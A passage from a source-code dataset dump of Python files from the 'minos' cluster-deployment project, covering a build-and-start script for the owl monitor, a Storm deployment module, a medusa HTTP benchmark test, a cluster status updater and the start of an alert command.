% OPENTSDB_ROOT\n cmd = [\"git\", \"clone\", \"%s\" % OPENTSDB_REPOSITORY, \"%s\" % OPENTSDB_ROOT]\n build_utils.execute_command(cmd, log_message=log_message)\n # copy the startup script to the OPENTSDB_ROOT\n cmd = [\"cp\", \"%s/start_opentsdb.sh\" % BUILD_BIN_ROOT, OPENTSDB_ROOT]\n build_utils.execute_command(cmd)\n\n # Compile opentsdb\n os.chdir(OPENTSDB_ROOT)\n log_message = \"Compiling opentsdb in %s\" % OPENTSDB_ROOT\n cmd = [\"./build.sh\"]\n build_utils.execute_command(cmd, log_message=log_message)\n os.chdir(MINOS_ROOT)\n\ndef generate_hbase_configuration():\n Log.print_info(\"Modify hbase-site.xml in %s\" % HBASE_CONFIG_ROOT)\n cmd = \"hbase_rootdir=${TMPDIR-'/tmp'}/tsdhbase;\" \\\n \"iface=lo`uname | sed -n s/Darwin/0/p`; echo $hbase_rootdir,$iface\"\n hbase_rootdir, iface = build_utils.get_command_variable(cmd).split(',')\n\n configuration_dict = {\n 'hbase_rootdir': hbase_rootdir,\n 'iface': iface,\n }\n build_utils.generate_config_file(HBASE_CONFIG_TEMPLATE,\n HBASE_CONFIG_FILE, configuration_dict)\n\ndef build_hbase():\n if build_utils.get_build_info_option('owl', 'hbase') == 'built':\n return\n\n if not os.path.exists(BUILD_DOWNLOAD_ROOT):\n os.mkdir(BUILD_DOWNLOAD_ROOT)\n os.chdir(BUILD_DOWNLOAD_ROOT)\n\n log_message = \"Setup hbase in %s\" % BUILD_DOWNLOAD_ROOT\n if not os.path.exists(os.path.basename(HBASE_TARBALL)):\n cmd = [\"wget\", \"%s\" % HBASE_TARBALL]\n build_utils.execute_command(cmd, log_message=log_message)\n\n if not os.path.exists(HBASE_ROOT):\n cmd = [\"tar\", \"xfz\", \"%s\" % os.path.basename(HBASE_TARBALL)]\n build_utils.execute_command(cmd)\n\n generate_hbase_configuration()\n os.chdir(MINOS_ROOT)\n\n # Mark hbase built\n build_utils.output_build_info('owl', 'hbase', 'built')\n\ndef create_hbase_table():\n if build_utils.get_build_info_option('owl', 'hbase_table') == 'created':\n return\n os.chdir(OPENTSDB_ROOT)\n log_message = \"Creating hbase table for opentsdb in %s\" % OPENTSDB_ROOT\n cmd = [\"env\", \"COMPRESSION=NONE\", \"HBASE_HOME=%s\" % HBASE_ROOT, \"./src/create_table.sh\"]\n build_utils.execute_command(cmd, log_message=log_message)\n os.chdir(MINOS_ROOT)\n\n # Mark hbase table created\n build_utils.output_build_info('owl', 'hbase_table', 'created')\n\ndef configure_opentsdb_collector(owl_port):\n # Configure opentsdb collector config file\n Log.print_info(\"Configuring opentsdb collector in %s\" %\n OPENTSDB_COLLECTOR_CONFIG_FILE)\n opentsdb_collector_dict = {\n 'owl_monitor_http_port': owl_port,\n 'tsdb': OPENTSDB_BIN_PATH,\n }\n build_utils.generate_config_file(OPENTSDB_COLLECTOR_CONFIG_TEMPLATE,\n OPENTSDB_COLLECTOR_CONFIG_FILE, opentsdb_collector_dict)\n\ndef configure_owl_config(args):\n Log.print_info(\"Configure owl config file: %s\" % OWL_CONFIG_FILE)\n owl_config_dict = {\n 'owl_ip': args.owl_ip,\n 'opentsdb_port': OPENTSDB_PORT,\n }\n build_utils.generate_config_file(OWL_CONFIG_TEMPLATE,\n OWL_CONFIG_FILE, owl_config_dict)\n\ndef check_input(input, yes='y'):\n return input.strip().lower() == yes.lower()\n\ndef start_hbase():\n # Start the stand-alone hbase\n build_utils.start_daemon_process('Hbase', HBASE_PID_FILE, HBASE_ROOT,\n './bin/start-hbase.sh')\n\ndef start_opentsdb():\n # Create hbase table for opentsdb\n create_hbase_table()\n # Start a TSD\n build_utils.start_daemon_process('Opentsdb', OPENTSDB_PID_FILE,\n OPENTSDB_ROOT, './start_opentsdb.sh', OPENTSDB_PORT)\n\ndef start_opentsdb_collector():\n build_utils.start_daemon_process('Opentsdb collector', OPENTSDB_COLLECTOR_PID_FILE,\n OPENTSDB_COLLECTOR_ROOT, './start_opentsdb_collector.sh')\n\ndef start_owl_collector():\n build_utils.start_daemon_process('Owl collector', OWL_COLLECTOR_PID_FILE,\n OWL_ROOT, './start_owl_collector.sh')\n\ndef start_quota_updater():\n build_utils.start_daemon_process('Quota updater', QUOTA_UPDATER_PID_FILE,\n OWL_ROOT, './start_quota_updater.sh')\n\ndef start_owl_monitor():\n owl_monitor_http_port = build_utils.get_build_info_option('owl', 'owl_port')\n if not owl_monitor_http_port:\n Log.print_critical(\"Owl port is null\")\n\n build_utils.start_daemon_process('Owl monitor', OWL_MONITOR_PID_FILE,\n OWL_ROOT, './start_owl_monitor.sh', owl_monitor_http_port)\n\ndef stop_opentsdb_collector():\n build_utils.stop_daemon_process('Opentsdb collector', OPENTSDB_COLLECTOR_PID_FILE,\n OPENTSDB_COLLECTOR_ROOT, STOP_PROCESS_SCRIPT)\n\ndef stop_owl_collector():\n build_utils.stop_daemon_process('Owl collector', OWL_COLLECTOR_PID_FILE,\n OWL_ROOT, STOP_PROCESS_SCRIPT)\n\ndef stop_quota_updater():\n build_utils.stop_daemon_process('Quota updater', QUOTA_UPDATER_PID_FILE,\n OWL_ROOT, STOP_PROCESS_SCRIPT)\n\ndef stop_owl_monitor():\n build_utils.stop_daemon_process('Owl monitor', OWL_MONITOR_PID_FILE,\n OWL_ROOT, STOP_PROCESS_SCRIPT)\n\ndef _build(args):\n if args.owl_ip == '127.0.0.1' or args.owl_port == 0:\n Log.print_critical(\"ERROR: Building owl needs to specify the localhost ip \" \\\n \"with '--owl_ip' and the owl monitor http port with '--owl_port'\")\n\n Log.print_info(\"Building owl\")\n # Check and install prerequisite python libraries\n Log.print_info(\"Check and install prerequisite python libraries\")\n build_utils.check_and_install_modules(OWL_PREREQUISITE_PYTHON_LIBS)\n\n check_third_party_tool_exists(\"gnuplot\")\n check_third_party_tool_exists(\"mysql\")\n create_and_configure_mysql_for_owl(args)\n create_django_database()\n\n # Deploy hbase\n if not args.skip_setup_hbase:\n build_hbase()\n start_hbase()\n\n # Deploy opentsdb\n deploy_opentsdb()\n if not args.skip_setup_hbase:\n start_opentsdb()\n\n # Configure opentsdb collector\n configure_opentsdb_collector(str(args.owl_port))\n # Configure owl config\n configure_owl_config(args)\n\n # Output build information\n build_utils.output_build_info(args.component, 'owl_port', args.owl_port)\n build_utils.output_build_info(args.component, 'build_status', 'success')\n Log.print_info(\"The component %s is built successfully\" % args.component)\n\ndef _do_start(args):\n start_owl_collector()\n\n if not args.skip_setup_hbase:\n start_opentsdb_collector()\n if args.quota_updater:\n start_quota_updater()\n\n start_owl_monitor()\n\ndef _do_stop():\n stop_owl_collector()\n stop_opentsdb_collector()\n stop_quota_updater()\n stop_owl_monitor()\n\ndef start(args):\n if not build_utils.get_build_info_option('owl', 'build_status') == 'success':\n _build(args)\n _do_start(args)\n\ndef stop(args):\n input = raw_input(\"Do you really want to do this ? (y/n)\")\n if check_input(input):\n _do_stop()\n else:\n Log.print_info(\"Skip stopping owl component\")\n\n"
},
{
"alpha_fraction": 0.7097112536430359,
"alphanum_fraction": 0.7101770043373108,
"avg_line_length": 39.50943374633789,
"blob_id": "0b29d2265d8a264aca634898d4128182ad46d02d",
"content_id": "af3a82e4f132883935545b18f590c4357d8975f3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8588,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 212,
"path": "/client/deploy_storm.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import deploy_utils\nimport parallel_deploy\n\nfrom log import Log\n\nALL_JOBS = [\"nimbus\", \"supervisor\", \"ui\", \"logviewer\", \"metricserver\"]\n\ndef generate_run_scripts_params(args, host, job_name, host_id, instance_id):\n job = args.storm_config.jobs[job_name]\n\n supervisor_client = deploy_utils.get_supervisor_client(host,\n \"storm\", args.storm_config.cluster.name, job_name, instance_id=instance_id)\n\n artifact_and_version = \"apache-storm-\" + args.storm_config.cluster.version\n\n component_dir = \"$package_dir\"\n jar_dirs = \"%s/:%s/lib/*:%s/*\" % (component_dir, component_dir, component_dir)\n log_level = deploy_utils.get_service_log_level(args, args.storm_config)\n\n params = job.get_arguments(args, args.storm_config.cluster, args.storm_config.jobs,\n args.storm_config.arguments_dict, job_name, host_id, instance_id)\n\n service_env = \"export SUPERVISOR_LOG_DIR=%s\" % deploy_utils.get_supervisor_client(host,\n \"storm\", args.storm_config.cluster.name, 'supervisor', instance_id=instance_id).get_log_dir()\n\n script_dict = {\n \"artifact\": artifact_and_version,\n \"job_name\": job_name,\n \"jar_dirs\": jar_dirs,\n \"run_dir\": supervisor_client.get_run_dir(),\n \"service_env\": service_env,\n \"params\": params,\n }\n\n return script_dict\n\ndef generate_start_script(args, host, job_name, host_id, instance_id):\n script_params = generate_run_scripts_params(args, host, job_name, host_id, instance_id)\n return deploy_utils.create_run_script(\n \"%s/start.sh.tmpl\" % deploy_utils.get_template_dir(), script_params)\n\ndef generate_configs(args, host, job_name, instance_id):\n storm_yaml = deploy_utils.generate_yaml_file(\n args.storm_config.configuration.generated_files[\"storm.yaml\"])\n config_files = {\n \"storm.yaml\": storm_yaml,\n }\n config_files.update(args.storm_config.configuration.raw_files)\n\n return config_files\n\ndef _get_storm_service_config(args):\n args.storm_config = deploy_utils.get_service_config(args)\n if not args.storm_config.cluster.zk_cluster:\n Log.print_critical(\n \"storm cluster must depends on a zookeeper clusters: %s\" %\n args.storm_config.cluster.name)\n\n nimbus_hosts = args.storm_config.jobs[\"nimbus\"].hosts\n supervisor_hosts = args.storm_config.jobs[\"supervisor\"].hosts\n args.storm_config.jobs[\"ui\"].hosts = nimbus_hosts.copy()\n args.storm_config.jobs[\"logviewer\"].hosts = supervisor_hosts.copy()\n\ndef install(args):\n _get_storm_service_config(args)\n deploy_utils.install_service(args, \"storm\", args.storm_config, \"apache-storm\")\n\ndef bootstrap_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n # parse the service_config according to the instance_id\n args.storm_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n deploy_utils.bootstrap_job(args, \"apache-storm\", \"storm\",\n args.storm_config, host, job_name, instance_id, cleanup_token, '0')\n start_job(args, host, job_name, host_id, instance_id)\n\ndef bootstrap(args):\n _get_storm_service_config(args)\n cleanup_token = deploy_utils.confirm_bootstrap(\"storm\", args.storm_config)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.storm_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'bootstrap', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(bootstrap_job, task_list)\n\ndef start_job(args, host, job_name, host_id, instance_id, is_wait=False):\n if is_wait:\n deploy_utils.wait_for_job_stopping(\"storm\",\n args.storm_config.cluster.name, job_name, host, instance_id)\n\n # parse the service_config according to the instance_id\n args.storm_config.parse_generated_config_files(args, job_name, host_id, instance_id)\n config_files = generate_configs(args, host, job_name, instance_id)\n start_script = generate_start_script(args, host, job_name, host_id, instance_id)\n http_url = deploy_utils.get_http_service_uri(host,\n args.storm_config.jobs[job_name].base_port, instance_id)\n deploy_utils.start_job(args, \"apache-storm\", \"storm\", args.storm_config,\n host, job_name, instance_id, start_script, http_url, **config_files)\n\ndef start(args):\n if not args.skip_confirm:\n deploy_utils.confirm_start(args)\n _get_storm_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.storm_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'start')\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef stop_job(args, host, job_name, instance_id):\n deploy_utils.stop_job(\"storm\", args.storm_config,\n host, job_name, instance_id)\n\ndef stop(args):\n if not args.skip_confirm:\n deploy_utils.confirm_stop(args)\n _get_storm_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.storm_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\ndef restart(args):\n if not args.skip_confirm:\n deploy_utils.confirm_restart(args)\n _get_storm_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.storm_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'stop')\n parallel_deploy.start_deploy_threads(stop_job, task_list)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.storm_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'start', is_wait=True)\n parallel_deploy.start_deploy_threads(start_job, task_list)\n\ndef generate_cleanup_script(args, job_name):\n storm_yaml_dict = args.storm_config.configuration.generated_files[\"storm.yaml\"]\n script_dict = {\n \"job_name\": job_name,\n \"storm_local_dir\": storm_yaml_dict['storm.local.dir'],\n }\n return deploy_utils.create_run_script(\n \"%s/storm/cleanup_storm.sh.tmpl\" % deploy_utils.get_template_dir(), script_dict)\n\ndef cleanup_job(args, host, job_name, host_id, instance_id, cleanup_token, active):\n cleanup_script = str()\n if job_name == \"supervisor\":\n cleanup_script = generate_cleanup_script(args, job_name)\n deploy_utils.cleanup_job(\"storm\", args.storm_config,\n host, job_name, instance_id, cleanup_token, cleanup_script)\n\ndef cleanup(args):\n _get_storm_service_config(args)\n\n cleanup_token = deploy_utils.confirm_cleanup(args,\n \"storm\", args.storm_config)\n for job_name in args.job or ALL_JOBS:\n hosts = args.storm_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name,\n 'cleanup', cleanup_token=cleanup_token)\n parallel_deploy.start_deploy_threads(cleanup_job, task_list)\n\ndef show_job(args, host, job_name, instance_id):\n deploy_utils.show_job(\"storm\", args.storm_config, host, job_name, instance_id)\n\ndef show(args):\n _get_storm_service_config(args)\n\n for job_name in args.job or ALL_JOBS:\n hosts = args.storm_config.jobs[job_name].hosts\n task_list = deploy_utils.schedule_task_for_threads(args, hosts, job_name, 'show')\n parallel_deploy.start_deploy_threads(show_job, task_list)\n\ndef rolling_update(args):\n if not args.job:\n Log.print_critical(\"You must specify the job name to do rolling update\")\n\n _get_storm_service_config(args)\n job_name = args.job[0]\n\n if not args.skip_confirm:\n deploy_utils.confirm_action(args, \"rolling_update\")\n\n Log.print_info(\"Rolling updating %s\" % job_name)\n hosts = args.storm_config.jobs[job_name].hosts\n wait_time = 0\n\n args.task_map = deploy_utils.parse_args_host_and_task(args, hosts)\n for host_id in args.task_map.keys() or hosts.iterkeys():\n for instance_id in args.task_map.get(host_id) or range(hosts[host_id].instance_num):\n instance_id = -1 if not deploy_utils.is_multiple_instances(host_id, hosts) else instance_id\n deploy_utils.confirm_rolling_update(host_id, instance_id, wait_time)\n stop_job(args, hosts[host_id].ip, job_name, instance_id)\n deploy_utils.wait_for_job_stopping(\"storm\",\n args.storm_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n start_job(args, hosts[host_id].ip, job_name, host_id, instance_id)\n deploy_utils.wait_for_job_starting(\"storm\",\n args.storm_config.cluster.name, job_name, hosts[host_id].ip, instance_id)\n wait_time = args.time_interval\n Log.print_success(\"Rolling updating %s success\" % job_name)\n\ndef run_shell(args):\n Log.print_critical(\"'shell' command is not supported!\")\n\ndef pack(args):\n Log.print_critical(\"'pack' command is not supported!\")\n\nif __name__ == '__main__':\n test()\n"
},
{
"alpha_fraction": 0.5265865921974182,
"alphanum_fraction": 0.546312153339386,
"avg_line_length": 21.86274528503418,
"blob_id": "ce6290874201cb3269a811a8c43d872460db13fe",
"content_id": "e94773956db3f16ed3e6b9c6a2dc52e51917a1c8",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1166,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 51,
"path": "/supervisor/supervisor/medusa/test/test_medusa.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nimport socket\nimport string\nimport time\nfrom supervisor.medusa import http_date\n\nnow = http_date.build_http_date (time.time())\n\ncache_request = string.joinfields (\n ['GET / HTTP/1.0',\n 'If-Modified-Since: %s' % now,\n ],\n '\\r\\n'\n ) + '\\r\\n\\r\\n'\n\nnocache_request = 'GET / HTTP/1.0\\r\\n\\r\\n'\n\ndef get (request, host='', port=80):\n s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)\n s.connect((host, port))\n s.send (request)\n while 1:\n d = s.recv (8192)\n if not d:\n break\n s.close()\n\nclass timer:\n def __init__ (self):\n self.start = time.time()\n def end (self):\n return time.time() - self.start\n\ndef test_cache (n=1000):\n t = timer()\n for i in xrange (n):\n get(cache_request)\n end = t.end()\n print 'cache: %d requests, %.2f seconds, %.2f hits/sec' % (n, end, n/end)\n\ndef test_nocache (n=1000):\n t = timer()\n for i in xrange (n):\n get(nocache_request)\n end = t.end()\n print 'nocache: %d requests, %.2f seconds, %.2f hits/sec' % (n, end, n/end)\n\nif __name__ == '__main__':\n test_cache()\n test_nocache()\n"
},
{
"alpha_fraction": 0.6701570749282837,
"alphanum_fraction": 0.674769401550293,
"avg_line_length": 34.17982482910156,
"blob_id": "80154e0dc6dab052681ad873378a839ecdbc98be",
"content_id": "e8c6121176cc946df007c3d0af8dff60c451d8ce",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8022,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 228,
"path": "/owl/collector/management/commands/status_updater.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import datetime\nimport json\nimport logging\nimport os\nimport time\n\nfrom django.utils import timezone\nfrom monitor.models import Cluster\nfrom monitor.models import Status\n\nimport gc\nimport resource\n\nlogger = logging.getLogger(__name__)\n\ndef get_latest_metric(task, group_name, metric_name):\n try:\n metric = json.loads(task.last_metrics)\n return metric[group_name][metric_name]\n except Exception as e:\n logger.warning(\"%r failed to get metric: %r\", task, e)\n return 0\n\ndef is_namenode_active(task):\n try:\n metric = get_latest_metric(task,\n \"Hadoop:service=NameNode,name=FSNamesystem\", \"tag.HAState\")\n return bool(metric)\n except Exception as e:\n logger.warning(\"%r failed to get metric: %r\", task, e)\n return False\n\ndef is_master_active(task):\n try:\n metric = get_latest_metric(task,\n \"hadoop:service=Master,name=Master\", \"IsActiveMaster\")\n # the active master metric for hbase 0.98\n metric_new = get_latest_metric(task,\n \"Hadoop:service=HBase,name=Master,sub=Server\", \"tag.isActiveMaster\")\n metric_new = 0 if not metric_new == 'true' else 1\n return bool(metric) or bool(metric_new)\n except Exception as e:\n logger.warning(\"%r failed to get metric: %r\", task, e)\n return False\n\ndef update_hdfs_cluster_status(cluster):\n job = cluster.jobs[\"journalnode\"]\n if (job.running_tasks_count < 2 or\n job.running_tasks_count < (job.total_tasks_count / 2 + 1)):\n job.last_status = Status.ERROR\n job.last_message = \"Too few running journalnodes!\"\n\n job = cluster.jobs[\"namenode\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running namenodes!\"\n else:\n active = 0\n for task in job.running_tasks.itervalues():\n if is_namenode_active(task):\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n cluster.version = get_latest_metric(task,\n 'Hadoop:service=NameNode,name=NameNodeInfo', 'Version')\n active += 1\n if active > 1:\n job.last_status = Status.ERROR\n job.last_message = \"Too many active namenodes!\"\n elif active < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No active namenodes!\"\n elif job.running_tasks_count < 2:\n job.last_status = Status.WARN\n job.last_message = \"Less than 2 running namenodes, no HA guarantee\"\n\n job = cluster.jobs[\"datanode\"]\n if job.running_tasks_count < 3:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running datanodes!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\ndef update_hbase_cluster_status(cluster):\n job = cluster.jobs[\"master\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running masters!\"\n else:\n active = 0\n for task in job.running_tasks.itervalues():\n if is_master_active(task):\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n version = get_latest_metric(task,\n 'hadoop:service=HBase,name=Info', 'version')\n revision = get_latest_metric(task,\n 'hadoop:service=HBase,name=Info', 'revision')\n cluster.version = '%s, r%s' % (version, revision)\n active += 1\n if active > 1:\n job.last_status = Status.ERROR\n job.last_message = \"Too many active masters!\"\n elif active < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No active masters!\"\n elif job.running_tasks_count < 2:\n # TODO: Now it always reports warning as backup master doesn't run a http\n # server before it acquires zk lock. Comment this out and would change\n # master's startup workflow.\n #job.last_status = Status.WARN\n #job.last_message = \"Less than 2 running masters, no HA guarantee\"\n pass\n\n job = cluster.jobs[\"regionserver\"]\n if job.running_tasks_count < 3:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running regionservers!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\ndef update_yarn_cluster_status(cluster):\n job = cluster.jobs[\"resourcemanager\"]\n for task in job.running_tasks.itervalues():\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running resourcemanager!\"\n\n job = cluster.jobs[\"proxyserver\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running proxyserver!\"\n\n job = cluster.jobs[\"nodemanager\"]\n if job.running_tasks_count < 3:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running nodemanager!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\n job = cluster.jobs[\"historyserver\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running historyserver!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\ndef update_impala_cluster_status(cluster):\n job = cluster.jobs[\"statestored\"]\n for task in job.running_tasks.itervalues():\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running statestored!\"\n\n job = cluster.jobs[\"impalad\"]\n if job.running_tasks_count < 3:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running impalad!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\ndef update_storm_cluster_status(cluster):\n job = cluster.jobs[\"metricserver\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running StormMetricsServer!\"\n\n job = cluster.jobs[\"ui\"]\n for task in job.running_tasks.itervalues():\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running Storm UI\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\ndef update_cluster_status(cluster, start_time):\n cluster.jobs = {}\n cluster.last_attempt_time = datetime.datetime.utcfromtimestamp(\n start_time).replace(tzinfo=timezone.utc)\n cluster.last_status = Status.OK\n cluster.last_message = \"\"\n\n for job in cluster.job_set.all():\n job.running_tasks = {}\n job.tasks = {}\n job.last_attempt_time = cluster.last_attempt_time\n job.last_status = Status.OK\n job.last_message = \"\"\n job.running_tasks_count = 0\n job.total_tasks_count = 0\n for task in job.task_set.filter(active=True):\n if task.health:\n job.running_tasks[task.id] = task\n job.running_tasks_count += 1\n job.total_tasks_count += 1\n cluster.jobs[job.name] = job\n\n service_handler = {\n \"hdfs\": update_hdfs_cluster_status,\n \"hbase\": update_hbase_cluster_status,\n \"yarn\": update_yarn_cluster_status,\n \"impala\": update_impala_cluster_status,\n \"storm\": update_storm_cluster_status,\n }\n service_handler[cluster.service.name](cluster)\n\n for job in cluster.jobs.itervalues():\n if job.last_status < Status.ERROR:\n # OK or WARN\n job.last_success_time = job.last_attempt_time\n job.save()\n\n if cluster.last_status < Status.ERROR:\n # OK or WARN\n cluster.last_success_time = job.last_attempt_time\n cluster.save()\n\ndef update_status_in_process(output_queue, task_data):\n logger.info(\"Updating clusters status in process %d\" % os.getpid())\n try:\n start_time = time.time()\n for cluster in Cluster.objects.filter(active=True).all():\n update_cluster_status(cluster, start_time)\n logger.info(\"spent %f seconds for updating clusters status\",\n time.time() - start_time)\n logger.info(\"gc: %r\", gc.get_count())\n logger.info(\"usage: %r\", resource.getrusage(resource.RUSAGE_SELF))\n except Exception as e:\n logger.warning(\"Failed to update status: %r\", e)\n\n"
},
{
"alpha_fraction": 0.6173293590545654,
"alphanum_fraction": 0.6205296516418457,
"avg_line_length": 35.22898483276367,
"blob_id": "a0cdb18d7ab146438ffb952ac096e78132620839",
"content_id": "d3bfad3cf832f001bcb89e85ad14fd2e226e37e8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12499,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 345,
"path": "/owl/alert/management/commands/alert.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import ConfigParser\nimport argparse\nimport datetime\nimport json\nimport logging\nimport os\nimport smtplib\nimport sys\nimport time\nimport utils.mail\n\nimport deploy_utils\n\nfrom optparse import make_option\nfrom os import path\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.utils import timezone\n\nfrom monitor.models import Status, Service, Cluster, Job, Task\n\nBOOL_METRIC_MAP = {\n \"tag.IsOutOfSync\": \"true\",\n \"tag.HAState\": \"active\",\n}\n\nSTATUS_FILE_PATH = 'cluster.status'\n# alert when cluster is not OK for ERROR_TIMES_FOR_ALERT\nERROR_TIMES_FOR_ALERT = 3\n\nlogger = logging.getLogger(__name__)\n\nclass CollectorConfig:\n class Service:\n def __init__(self, options, config, name):\n # Parse service config.\n self.name = name\n self.jobs = config.get(name, \"jobs\").split()\n self.clusters = {}\n for cluster_name in config.get(name, \"clusters\").split():\n args = argparse.Namespace()\n args.service = self.name\n args.cluster = cluster_name\n # Parse cluster config.\n self.clusters[cluster_name] = deploy_utils.get_service_config(args)\n self.metric_url = config.get(name, \"metric_url\")\n\n def __init__(self, args, options):\n # Parse collector config.\n config_path = os.path.join(deploy_utils.get_config_dir(), 'owl/collector.cfg')\n self.args = args\n self.options = options\n self.config = self.parse_config_file(config_path)\n self.services = {}\n for service_name in self.config.get(\"collector\", \"services\").split():\n self.services[service_name] = CollectorConfig.Service(\n options, self.config, service_name)\n self.period = self.config.getint(\"collector\", \"period\")\n\n def parse_config_file(self, config_path):\n config_parser = ConfigParser.SafeConfigParser()\n config_parser.optionxform = str\n logger.info(\"Parsing config file: %s\", config_path)\n if not config_parser.read(config_path):\n logger.critical(\"Can't parse config file: %s\", config_path)\n sys.exit(1)\n logger.info(\"Successfully parsed config file\")\n return config_parser\n\nclass StatusChecker:\n \"\"\"Check status of all active clusters and jobs, which are inferred from\n tasks' status.\"\"\"\n\n def __init__(self, collector_config, last_status, options, mailer):\n self.collector_config = collector_config\n self.last_status = last_status\n self.options = options\n self.alert_msg = ''\n self.mailer = mailer\n\n def get_latest_metric(self, task, group_name, metric_name):\n try:\n metric = json.loads(task.last_metrics)\n return metric[group_name][metric_name]\n except Exception as e:\n logger.warning(\"%r failed to get metric: %r\", task, e)\n return 0\n\n def is_namenode_active(self, task):\n try:\n metric = self.get_latest_metric(\n task, \"Hadoop:service=NameNode,name=FSNamesystem\", \"tag.HAState\")\n return bool(metric)\n except Exception as e:\n logger.warning(\"%r failed to get metric: %r\", task, e)\n return False\n\n def is_master_active(self, task):\n try:\n metric = self.get_latest_metric(\n task, \"hadoop:service=Master,name=Master\", \"IsActiveMaster\")\n return bool(metric)\n except Exception as e:\n logger.warning(\"%r failed to get metric: %r\", task, e)\n return False\n\n def check_hdfs_cluster_status(self, cluster):\n job = cluster.jobs[\"journalnode\"]\n if (job.running_tasks_count < 2 or\n job.running_tasks_count < (job.total_tasks_count / 2 + 1)):\n job.last_status = Status.ERROR\n job.last_message = \"Too few running journalnodes!\"\n\n job = cluster.jobs[\"namenode\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running namenodes!\"\n else:\n active = 0\n for task in job.running_tasks.itervalues():\n if self.is_namenode_active(task):\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n cluster.version = self.get_latest_metric(task,\n 'Hadoop:service=NameNode,name=NameNodeInfo',\n 'Version')\n active += 1\n if active > 1:\n job.last_status = Status.ERROR\n job.last_message = \"Too many active namenodes!\"\n elif active < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No active namenodes!\"\n elif job.running_tasks_count < 2:\n job.last_status = Status.WARN\n job.last_message = \"Less than 2 running namenodes, no HA guarantee\"\n\n job = cluster.jobs[\"datanode\"]\n if job.running_tasks_count < 3:\n job.last_status = Status.ERROR\n job.last_message = \"Too few running datanodes!\"\n cluster.last_status = max([job.last_status for job in cluster.jobs.itervalues()])\n\n def check_hbase_cluster_status(self, cluster):\n job = cluster.jobs[\"master\"]\n if job.running_tasks_count < 1:\n job.last_status = Status.ERROR\n job.last_message = \"No running masters!\"\n else:\n active = 0\n for task in job.running_tasks.itervalues():\n if self.is_master_active(task):\n # update cluster entry\n cluster.entry = '%s:%d' % (task.host, task.port)\n version = self.get_latest_metric(task,\n 'hadoop:service=HBase,name=Info',\n 'version')\n revision = self.get_latest_metric(task,\n 'hadoop:service=HBase,name=Info',\n 'revision')\n cluster.version = '%s, r%s' % (version, revision)\n active += 1\n if active > 1:\n job.last_status = 